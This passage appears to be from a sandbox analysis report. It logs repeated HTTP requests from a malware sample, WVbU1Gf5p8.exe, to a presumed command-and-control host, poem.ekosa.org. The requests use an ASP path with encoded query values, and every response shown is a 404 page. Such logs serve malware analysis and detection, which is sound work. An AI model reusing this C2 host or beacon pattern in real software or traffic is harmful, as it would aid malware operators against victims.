      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      186192.168.2.449966210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:45.065449953 CET5213OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:45.324115038 CET5213INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:45 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      187192.168.2.449967210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:45.596781015 CET5214OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:45.858217001 CET5215INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:45 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      188192.168.2.449968210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:46.153100967 CET5215OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:46.409792900 CET5216INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:46 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      189192.168.2.449969210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:46.829166889 CET5217OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:47.096776962 CET5217INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:46 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      19192.168.2.449783210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:07.608453035 CET388OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:07.871875048 CET388INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      190192.168.2.449970210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:47.519306898 CET5218OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:47.781912088 CET5219INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      191192.168.2.449971210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:48.175436020 CET5219OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:48.446273088 CET5220INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      192192.168.2.449972210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:48.830677986 CET5221OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:49.091150045 CET5221INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      193192.168.2.449973210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:49.365000010 CET5222OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:49.629981041 CET5222INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      194192.168.2.449974210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:49.900779009 CET5223OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:50.162297010 CET5224INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      195192.168.2.449975210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:50.537497997 CET5224OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
